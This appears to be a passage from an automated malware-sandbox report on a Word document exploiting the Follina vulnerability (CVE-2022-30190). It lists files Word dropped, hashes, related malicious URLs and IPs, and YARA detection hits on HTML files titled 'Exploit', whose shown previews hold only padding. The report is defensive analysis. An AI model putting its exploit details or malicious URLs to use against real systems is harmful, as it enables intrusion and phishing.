                                                                                                                                                                                                                                  J92WUldVoP.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                    KYYE76X2Wl.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                      E20920A7259CABE4F4BBEF5BF983181AD47FB8C075D7F.exeGet hashmaliciousBrowse
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                                                                                                        https://habach-youssef1.systeme.io/apozke/contactGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.1.26
                                                                                                                                                                                                                                        https://blog.transformarecife.com.br/https/bpi.com.ph/onlinebanking/px1ugqJFYX9VRQcDykZ4wS7f6iWmNB28KbdUensa0TA3EHzMGLjtCOhPoIvr5l/index.php?auth=px1ugqJFYX9VRQcDykZ4wS7f6iWmNB28KbdUensa0TA3EHzMGLjtCOhPoIvr5lGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.64.114
                                                                                                                                                                                                                                        https://michelz.clickfunnels.com/webinar-registrationhc87zwq8Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.2.137
                                                                                                                                                                                                                                        iAXreikIsA.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        Cap Rate Realty LLC.jarGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 199.232.192.209
                                                                                                                                                                                                                                        PAYMENT COPY PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.2.159
                                                                                                                                                                                                                                        https://encrypted-invoice-ref0091.myportfolio.com/Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.2.137
                                                                                                                                                                                                                                        https://gfdbfshnfndbfzgbzxcbzcbxbzcbzb.myportfolio.com/Get hashmaliciousBrowse
                                                                                                                                                                                                                                        • 151.101.0.119
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
No context
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: Microsoft Access Database
Category: dropped
Size (bytes): 528384
Entropy (8bit): 0.4757000931758257
Encrypted: false
SSDEEP: 384:KGfXGwX2JCwNR/f/HNvs8SF3fZ0jGB8wTvW6wtZ1Ij+hVZO4Fg:hfXGsmCdHvZyWe6/QI
MD5: CD17EFEF7B2FFAF9A9AA5B66A3ECFBFB
SHA1: 9C39FDE7C9A92D372A3EDA777E0E12C4042F37B6
SHA-256: E943911CD0EE1A288605391DDD0D342AE90CB285DB5F6340310370255BAEDFDD
SHA-512: 033D8FAF9119EB39224563151161619172B416D1D076646FA2B7CF98DC05ECE6B42907FF9F42159B7D385A23403CA6AF5F5F39FF583ECC6426E578C2DE2C5489
Malicious: false
Reputation: low
Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...NqU.7...1.(....`.:{6....Z.C8..3..y[e.|*..|......#....f_...$.g..'D...e....F.x....-b.T...4.0
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):36
                                                                                                                                                                                                                                        Entropy (8bit):2.730660070105504
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                                                                                                        MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                                                                                                        SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                                                                                                        SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                                                                                                        SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                        Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                                        Entropy (8bit):1.4172860556164644
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:GUfFF/FaV:DtFdu
                                                                                                                                                                                                                                        MD5:C2AC3C4E2F040FECC0C759333329FC5F
                                                                                                                                                                                                                                        SHA1:D60D4854A23808FD2D67A20DDD9001D5567B1F53
                                                                                                                                                                                                                                        SHA-256:F42C7EE07D25E6BCABCFDA1B8EA31928008FDA1A2C51E8D5C08410E6802EF2F3
                                                                                                                                                                                                                                        SHA-512:5EFBE74E618899E05B228FB255CBF20468ED9303723F508202CED231FB0CAD966A92D7F092FC286CA5211EB8F56A0C6EA5CD742D94003064E7C42D92137C9DF8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:855271. Admin.
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):148061
                                                                                                                                                                                                                                        Entropy (8bit):5.358148909393495
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:AcQW/gxgB5BQguwN/Q9DQe+zQTk4F77nXmvid3XxVETLKz61:z1Q9DQe+zuXYr
                                                                                                                                                                                                                                        MD5:B42FC442BE4F5E74973A484FD49F9647
                                                                                                                                                                                                                                        SHA1:C0E027DB870B5724DF5556C69462AB728E664129
                                                                                                                                                                                                                                        SHA-256:66C3D61980CC73F60BDD8E0DEA062F0CC30AD7F37B3CC0B1AE18B98C1CE98AA8
                                                                                                                                                                                                                                        SHA-512:DFE4EFF101B12E9A99882341CF94768A2AD1E67271FB86CAEBA4072A8248721F5C624836DC953EEF62EB7D3F316CB21733C980EB8D943A204189BF48D04ABB11
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-08-18T01:57:02">.. Build: 16.0.15614.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8226
                                                                                                                                                                                                                                        Entropy (8bit):2.4313825008807632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:0WUe4ZX2X2X2X2X2X2X2X2uX2X2X2X2X2X2fdlR1N7GDX4S0VMn:0WUe4hyyyyyyyzyyyyySdCb4S3n
                                                                                                                                                                                                                                        MD5:E70739707D44DAD5084EA7BC0591D68D
                                                                                                                                                                                                                                        SHA1:7C96844A9FE8AC7E1270A7A30F15B07963137AE6
                                                                                                                                                                                                                                        SHA-256:555536B16091930DC53A5D6E66C40E43A440CAF9DE7A620383FBB13AD0144A75
                                                                                                                                                                                                                                        SHA-512:81BD09BE364EDD5F723D2E62B7FB8E2EEA98435EF3E5F3E528263284365D84425F8DA8979C6018494691C8AE794BC74A9A50BCA31D0B07AC17C81A704CF56751
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1BDECE2D.txt, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                                                                        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1BDECE2D.txt, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1BDECE2D.txt, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:<!doctype html>..<html lang="en">..<head>..<title>..Exploit..</title>..</head>..<body>....<script>..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8226
                                                                                                                                                                                                                                        Entropy (8bit):2.4313825008807632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:0WUe4ZX2X2X2X2X2X2X2X2uX2X2X2X2X2X2fdlR1N7GDX4S0VMn:0WUe4hyyyyyyyzyyyyySdCb4S3n
                                                                                                                                                                                                                                        MD5:E70739707D44DAD5084EA7BC0591D68D
                                                                                                                                                                                                                                        SHA1:7C96844A9FE8AC7E1270A7A30F15B07963137AE6
                                                                                                                                                                                                                                        SHA-256:555536B16091930DC53A5D6E66C40E43A440CAF9DE7A620383FBB13AD0144A75
                                                                                                                                                                                                                                        SHA-512:81BD09BE364EDD5F723D2E62B7FB8E2EEA98435EF3E5F3E528263284365D84425F8DA8979C6018494691C8AE794BC74A9A50BCA31D0B07AC17C81A704CF56751
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txt, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                                                                        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txt, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txt, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:<!doctype html>..<html lang="en">..<head>..<title>..Exploit..</title>..</head>..<body>....<script>..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8226
                                                                                                                                                                                                                                        Entropy (8bit):2.4313825008807632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:0WUe4ZX2X2X2X2X2X2X2X2uX2X2X2X2X2X2fdlR1N7GDX4S0VMn:0WUe4hyyyyyyyzyyyyySdCb4S3n
                                                                                                                                                                                                                                        MD5:E70739707D44DAD5084EA7BC0591D68D
                                                                                                                                                                                                                                        SHA1:7C96844A9FE8AC7E1270A7A30F15B07963137AE6
                                                                                                                                                                                                                                        SHA-256:555536B16091930DC53A5D6E66C40E43A440CAF9DE7A620383FBB13AD0144A75
                                                                                                                                                                                                                                        SHA-512:81BD09BE364EDD5F723D2E62B7FB8E2EEA98435EF3E5F3E528263284365D84425F8DA8979C6018494691C8AE794BC74A9A50BCA31D0B07AC17C81A704CF56751
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                                                                        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:<!doctype html>..<html lang="en">..<head>..<title>..Exploit..</title>..</head>..<body>....<script>..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8226
                                                                                                                                                                                                                                        Entropy (8bit):2.4313825008807632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:0WUe4ZX2X2X2X2X2X2X2X2uX2X2X2X2X2X2fdlR1N7GDX4S0VMn:0WUe4hyyyyyyyzyyyyySdCb4S3n
                                                                                                                                                                                                                                        MD5:E70739707D44DAD5084EA7BC0591D68D
                                                                                                                                                                                                                                        SHA1:7C96844A9FE8AC7E1270A7A30F15B07963137AE6
                                                                                                                                                                                                                                        SHA-256:555536B16091930DC53A5D6E66C40E43A440CAF9DE7A620383FBB13AD0144A75
                                                                                                                                                                                                                                        SHA-512:81BD09BE364EDD5F723D2E62B7FB8E2EEA98435EF3E5F3E528263284365D84425F8DA8979C6018494691C8AE794BC74A9A50BCA31D0B07AC17C81A704CF56751
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<!doctype html>..<html lang="en">..<head>..<title>..Exploit..</title>..</head>..<body>....<script>..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 16 12:41:30 2022, mtime=Thu Aug 18 00:57:10 2022, atime=Thu Aug 18 00:56:59 2022, length=10190, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1060
                                                                                                                                                                                                                                        Entropy (8bit):4.661675465135594
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:8uBrKvHA7VqwNKUAJb8Z8IDZeaek7aB6m:88rKvHIqwNGJG8lVhB6
                                                                                                                                                                                                                                        MD5:60F4C253F2937CB95997E687E20A9B19
                                                                                                                                                                                                                                        SHA1:3562500F44848CC3EFA361BB32717EA5BF546F26
                                                                                                                                                                                                                                        SHA-256:0FEC411E4A05A1B9528DCA2825E41545E57A4C057BF5D79380F3A97D0055518C
                                                                                                                                                                                                                                        SHA-512:62CCC781BA036CB0A986DE4085B33FAAEAB72994A7D4760A787B0DFC11E783875B61E71E49F21AED0C19B79D0645CA1C2C33A822145C1FCA3CFFCC3C74D8B8F3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:L..................F.... .....L.u.....5....8.o.....'...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...U......................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1......U1m..user.<.......N...U......#J....................2ax.j.o.n.e.s.....~.1......U2m..Desktop.h.......N...U.......Y..............>......`.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2..'...U . .DL18AY~1.DOC..P.......U0m.U .....P......................7d.d.l.1.8.a.Y.T.B.o.5...d.o.c.x.......U...............-.......T...........>.S......C:\Users\user\Desktop\dl18aYTBo5.docx..&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.l.1.8.a.Y.T.B.o.5...d.o.c.x.........:..,.LB.)...As...`.......X.......855271...........!a..%.H.VZAj.....r.h............!a..%.H.VZAj.....r.h.......................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                        Entropy (8bit):4.721620404569601
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:bDuMJlZ0nLLUmxWK0nLLUv:bCS0L+LC
                                                                                                                                                                                                                                        MD5:78743467AD7B7A7C4AEA7B26F05F0159
                                                                                                                                                                                                                                        SHA1:1EE278AFB6EAE05D6BAD394AC28A4AC85E36A994
                                                                                                                                                                                                                                        SHA-256:ABD0F630011CFCF4BA855FFF7AF8C5644D09A8F1A424F1EC8D3C0186ECCB6582
                                                                                                                                                                                                                                        SHA-512:DBCB93CE9E7236A91C1BCDF35F7840ABE97FDD5B915E1698A703058F108986C7AC64C7E5276B5D237429F9B146A475BBC9C91C1442BEC56C80A0674AFA7EF448
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:[folders]..Templates.LNK=0..dl18aYTBo5.LNK=0..[misc]..dl18aYTBo5.LNK=0..
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):162
                                                                                                                                                                                                                                        Entropy (8bit):2.358092282332054
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Rl/ZddSBdl/tlpWQUnlqSpUWdQ6ltllltr:RtZfSr7WBooPvB
                                                                                                                                                                                                                                        MD5:375CCA4DBD946D609D4615D1F34044E2
                                                                                                                                                                                                                                        SHA1:D5FE02B6D69BE028B1DE29CABE684B7BB1AA83EC
                                                                                                                                                                                                                                        SHA-256:D8491E148D3AB089497B0709FE2B1C4DB166CDFAEE6E3D1D07006B75D04CE087
                                                                                                                                                                                                                                        SHA-512:FB6BC1DBA2F9DE09395A1BA7AAB33C067F3C1ABE49677152C3008C18E0B81D8798D22E85471CA1AF85BDF1010D88442E59EA50FFE3D9C020A59B3AAE0003D249
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.pratesh................................................p.r.a.t.e.s.h..........s..F............................s..1...........T.......6C..8.6..s..................
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20
                                                                                                                                                                                                                                        Entropy (8bit):2.8954618442383215
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                                                                                                                        MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                                                                                                                        SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                                                                                                                        SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                                                                                                                        SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:..p.r.a.t.e.s.h.....
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):162
                                                                                                                                                                                                                                        Entropy (8bit):2.358092282332054
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Rl/ZddSBdl/tlpWQUnlqSpUWdQ6ltllltr:RtZfSr7WBooPvB
                                                                                                                                                                                                                                        MD5:375CCA4DBD946D609D4615D1F34044E2
                                                                                                                                                                                                                                        SHA1:D5FE02B6D69BE028B1DE29CABE684B7BB1AA83EC
                                                                                                                                                                                                                                        SHA-256:D8491E148D3AB089497B0709FE2B1C4DB166CDFAEE6E3D1D07006B75D04CE087
                                                                                                                                                                                                                                        SHA-512:FB6BC1DBA2F9DE09395A1BA7AAB33C067F3C1ABE49677152C3008C18E0B81D8798D22E85471CA1AF85BDF1010D88442E59EA50FFE3D9C020A59B3AAE0003D249
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.pratesh................................................p.r.a.t.e.s.h..........s..F............................s..1...........T.......6C..8.6..s..................
